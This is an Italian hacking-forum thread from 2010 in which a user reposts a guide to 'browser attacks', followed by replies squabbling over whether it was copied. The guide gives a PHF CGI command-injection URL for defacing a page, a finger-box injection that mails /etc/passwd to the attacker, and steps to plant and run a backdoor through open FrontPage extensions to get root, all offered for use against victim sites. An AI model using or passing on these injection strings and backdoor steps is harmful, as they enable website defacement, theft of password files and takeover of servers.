-
.
I Browser Attack sono quegli attacchi che vengono portati dal vostro browser,senza particolari software. Oltre ai vari attacchi PHF e Query, ci sono anche altri attacchi o varianti di PHF/Query
Cambiare una pagina web dal tuo browser
Questa corta sezione descrive la stinga da usare per modificare una pagina web da tuo browser. All'indirizzo http://www.sito.com aggiungiamo la seguente stringa
cgi-bin/phf?Qalias=x%0a/bin/echo%20 "Crepa Lamer!!!"%20>>filename.html(questa è una variante del PHF).
Questa stringati permette di scrivere su filename.html e aggiungere "Crepa Lamer!!!" devono essere in formato html. Puoi inserire del testo delle immagini o qualsiasi altra cosa tu voglia.
Finger box hacking:
Diciamo di voler "bucare" un sito tipo www.sito.com(ancora lui...). La prima cosa da fare sara' scivere l'URL Http://www.sito.com. Poi aggiungete all'url /cgi-bin/finger in modo da ottenere Http://www.aol.com/cgi-bin/finger. Se il finger e' attivo un box dovrebbe apparire per inserire il nome della persona su cui eseguire il comando. Se questo avviene tu hai la possibilita' di ricevere il file /etc/passwd. La prossima cosa da fare sara' di trovare un mailto sulla web page ([email protected] o [email protected] ad esempio). Ora ritorna al box e scrivi: [email protected];/bin/mail [email protected] > /etc/passwd ...questa stringa manda a voi una mail da [email protected] contenente il file delle password(madonna che goduria!!!)
FrontPage
Il metodo che citerò adesso serve x inserire una backdoor in un sito che ha le estensioni di FrontPage. Per sapere se un sito ha le estensioni di FrontPage:
O c'è scritto direttamente sulla home page del sito. O guardate L'html della home page,e dovreste notare una cosa del genere:
meta name="GENERATOR" content="Microsoft FrontPage 3.0"
Apriamo il FrontPage98 o FrontPage Express e clicchiamo su File. Apriamo Front Page Box,poi scegliamo la voce Apri Web esistente, mettiamo il sito da hackerare e premiamo OK. Appena connessi, se ci chiederà la password dobbiamo lasciar stare,ma se non c'è la chiederà(cosa molto probabile),il 50%del lavoro è fatto. Entriamo nella cartella CGI-BIN e facciamo un Up-Load e ci mettiamo una backdoor.Andiamo al nostro amato browser, e digitiamo:
htto://server_vittima/cgi-bin/nome_della_backdoor.exe
così facciamo partire la nostra backdoor. Adesso il server non ci darà nessuna risposta, e andiamo a vedere subito se la backdoor è stata attivata. Se sì,siamo root. Se invece la backdoor non viene attivata, dovete dare il tempo al server di aggiornarsi e far eseguire il trojan.
fonte: webnet32.com
Edited by DarkDevil88 - 2/1/2010, 10:47. -
MS-DOS.
User deleted
Ottima Guida. Semplice, ma soprattutto molto chiara.
Ps : Fonte ?
Ps 2 : Se l'hai fatta tu, davvero notevole. -
Hack4it.
User deleted
sei bravo a schiacciare CTRL + C
. -
666_@N63_17.13.
User deleted
ed allora nn ha messo la fonte è vero ma percaso trovi scritto che la guida l'ha fatta lui?? io nn lo leggo . -
megas93.
User deleted
non e uguale -.- prima di parlare leggile bene . -
DarkDevil88.
User deleted
aggiunta fonte anche se probabilmente sarà stata copiata a sua volta ma vabbè . -
MS-DOS.
User deleted
CITAZIONE (megas93 @ 1/1/2010, 20:15)non e uguale -.- prima di parlare leggile bene
Quoto. Non è assolutamente uguale ._.
. -
Coospanda.
User deleted
Hello there fellas! How do you think you're right now? .